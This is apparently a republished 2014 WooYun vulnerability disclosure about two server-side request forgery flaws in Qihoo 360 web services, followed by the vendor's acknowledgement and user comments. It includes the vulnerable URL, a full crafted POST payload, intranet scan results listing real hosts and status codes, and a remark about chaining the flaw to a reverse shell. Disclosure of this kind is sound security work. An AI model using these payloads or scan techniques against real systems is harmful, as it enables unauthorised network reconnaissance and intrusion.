利用两个鸡肋SSRF探测360内网

admin
admin
admin
139487
文章
114
评论
2015年8月12日21:38:03评论393 views字数 207阅读0分41秒阅读模式
摘要

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-17: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向核心白帽子及相关领域专家公开
2014-12-07: 细节向普通白帽子公开
2014-12-17: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

漏洞概要 关注数(63) 关注此漏洞

缺陷编号: WooYun-2014-83592

漏洞标题: 利用两个鸡肋SSRF探测360内网

相关厂商: 奇虎360

漏洞作者: lijiejie利用两个鸡肋SSRF探测360内网

提交时间: 2014-11-17 15:46

公开时间: 2015-01-01 15:48

漏洞类型: 设计缺陷/逻辑错误

危害等级: 中

自评Rank: 6

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

10人收藏

漏洞详情

披露状态:

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-17: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向核心白帽子及相关领域专家公开
2014-12-07: 细节向普通白帽子公开
2014-12-17: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

简要描述:

利用两个鸡肋SSRF探测360内网

详细说明:

两个SSRF都比较鸡肋,但仍值得一试。

第一个SSRF位于:

code 区域 
http://te.tuan.360.cn/checkapi_ajax.html?apiurl=http://soft.corp.qihoo.net

只能返回HTTP Status。可以探测指定的端口是否开放web服务(如80,8360,8080,8000),以及相应的资源是否存在。

第二个SSRF位于diy主题:

code 区域 
POST /diy/sl/themes/getpreview HTTP/1.1
 Content-Length: 862
 Content-Type: application/x-www-form-urlencoded
 Cookie: sc=52cfa2a2123cceed13f31e75.THEME.1
 Host: meihua.360.cn
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
 Accept: */*
 
 data=%7b%22banner%22:%7b%22url%22:%22http://img1.mobile.360.cn/c0/cdn/baibian/themeResource/image/banner/2655e631-ed27-4d1e-9e14-76a91c50b528.png%22%7d%2c%22default_lock_wallpaper%22:%7b%22url%22:%22http:%5c/%5c/220.181.156.221:8360/favicon.ico%22%7d%2c%22incharge%22:%7b%22color%22:%22FFFFFF%22%2c%22size%22:18%7d%2c%22status_bar%22:%7b%22url%22:%22http://p2.qhimg.com/t01e34730d2f2f6a5be.png%22%7d%2c%22txt_clock%22:%7b%22color%22:%22FFFFFF%22%2c%22size%22:64%7d%2c%22txt_date%22:%7b%22color%22:%22FFFFFF%22%2c%22size%22:20%7d%2c%22unlock_button%22:%7b%22url%22:%22http://img1.mobile.360.cn/c0/cdn/baibian/themeResource/image/unlock_button/837bad4f-ed18-41fd-b2f3-4faa1b5fa9fd.png%22%7d%2c%22unlock_button_selected%22:%7b%22url%22:%22http://img1.mobile.360.cn/c0/cdn/baibian/themeResource/image/unlock_button_selected/c2ea4be6-c76f-4cfb-9573-a5c3e7617742.png%22%7d%7d

default_lock_wallpaper.url等多个参数均可以构造。可以把我们指定URL的图片合成到一张新图片上。

漏洞证明:

对于第一处,简单示例获取C段对应开放8360的主机。得到:

code 区域 
http://220.181.156.34:8360 返回200
 http://220.181.156.35:8360 返回200
 http://220.181.156.41:8360 返回200
 (中间全省略)
 http://220.181.156.64:8360 返回200
 http://220.181.156.100:8360 返回200
 http://220.181.156.102:8360 返回200
 (中间全省略)
 http://220.181.156.106:8360 返回200
 http://220.181.156.221:8360 返回200
 http://220.181.156.227:8360 返回200
 http://220.181.156.241:8360 返回200
 http://220.181.156.244:8360 返回200
  
 http://220.181.156.8:8360 返回404
 http://220.181.156.18:8360 返回500
 http://220.181.156.36:8360 返回404
 http://220.181.156.37:8360 返回404
 http://220.181.156.38:8360 返回404
 http://220.181.156.40:8360 返回404
 http://220.181.156.65:8360 返回403
 http://220.181.156.107:8360 返回302
 http://220.181.156.108:8360 返回500
 http://220.181.156.109:8360 返回302
 http://220.181.156.119:8360 返回403
 http://220.181.156.120:8360 返回403
 http://220.181.156.122:8360 返回403
 http://220.181.156.159:8360 返回401
 http://220.181.156.173:8360 返回403
 http://220.181.156.124:8360 返回403
 http://220.181.156.176:8360 返回401
 http://220.181.156.210:8360 返回403
 http://220.181.156.219:8360 返回403
 http://220.181.156.228:8360 返回401
 http://220.181.156.242:8360 返回302
 http://220.181.156.243:8360 返回401
 http://220.181.156.247:8360 返回401
 http://220.181.156.248:8360 返回302
 http://220.181.156.249:8360 返回302
 http://220.181.156.252:8360 返回401

比如,我们可以探测那些外网无法访问的资源。

地址http://soft.corp.qihoo.net,ping之后得到10.108.79.189。正常情况外网肯定无法访问。但是漏洞1可以探测到目标主机的,并且返回的是200,如图:

利用两个鸡肋SSRF探测360内网

提示XML格式不正确,说明已经下载成功。

扫一个C段,继续探测内网开放80端口的主机,得到10.108.79.189段大量80提供web服务的主机:

利用两个鸡肋SSRF探测360内网

8360端口的web服务也很多,不再截图。

利用这个漏洞可以盲打内网,限制极大,例如尝试利用structs命令执行漏洞反弹shell output回来。

下面继续说第二个漏洞。它的作用更鸡肋,帮我们把Server能访问到的web图片合成出来,搬到外网来。尝试合成内网几个favicon.ico的时候遇到点问题,似乎并未成功。

节约时间,就找了几个外网无法访问的资源来合成。仅说明问题存在:

code 区域 
220.181.156.102:8360/favicon.ico
 220.181.156.103:8360/favicon.ico
 220.181.156.104:8360/favicon.ico
 220.181.156.105:8360/favicon.ico
 220.181.156.106:8360/favicon.ico
 
 http://img1.mobile.360.cn/c0/baibian/themes/images/origin/preview_resources_1416203408887_1416203408887.jpg
 
 
 220.181.156.107:8360/favicon.ico
 220.181.156.109:8360/favicon.ico
 220.181.156.221:8360/favicon.ico
 http://img1.mobile.360.cn/c0/baibian/themes/images/origin/preview_resources_1416203645372_1416203645372.jpg
 
 
 220.181.156.210:8360/favicon.ico
 http://img1.mobile.360.cn/c0/baibian/themes/images/origin/preview_resources_1416203759520_1416203759520.jpg

如图,可以看到220.181.156.102:8360/favicon.ico的模样:

利用两个鸡肋SSRF探测360内网

修复方案:

过滤,限制

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-11-17 16:18

厂商回复:

感谢您的反馈,正在通知相关业务进行修复。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-11-17 16:00 | 低调的瘦子 ( 普通白帽子 | Rank:504 漏洞数:61 | loading……………………)

    1

    前排~

  2. 2014-11-17 16:01 | 摸了你 ( 实习白帽子 | Rank:71 漏洞数:12 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)

    1

    好吊,想送你一辣条。

  3. 2014-11-17 16:09 | 龍 、 ( 普通白帽子 | Rank:474 漏洞数:157 | 你若安好 我就是晴天)

    1

    好吊

  4. 2014-11-17 16:10 | 爱Gail ( 普通白帽子 | Rank:237 漏洞数:38 | 爱漏洞、爱编程、爱旅游、爱Gail)

    1

    好厉害,我只是社工进去了下798旁边的大楼

  5. 2014-11-17 16:11 | debbbbie ( 路人 | Rank:10 漏洞数:2 | 深藏功与名 - A Rubyist)

    1

    吊!

  6. 2014-11-17 16:14 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:82 | ★ 梦想这条路踏上了,跪着也要...)

    1

    前排

  7. 2014-11-17 16:17 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:28 | 不是因为看到了希望才去努力,而是努力了才...)

    1

    好吊,想送你一辣条。

  8. 2014-11-17 16:25 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:177 | 力不从心)

    1

    直接进东哥办公室,然后上网渗透。

  9. 2014-11-17 17:01 | greg.wu ( 普通白帽子 | Rank:1044 漏洞数:99 | 打酱油的~)

    1

    洞主上班好闲啊,整天刷rank,涨的飞快,牛逼

  10. 2014-11-17 18:14 | 老笨蛋 ( 路人 | Rank:29 漏洞数:3 | 老笨蛋一个)

    1

    牛老大,武哥想你了……

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin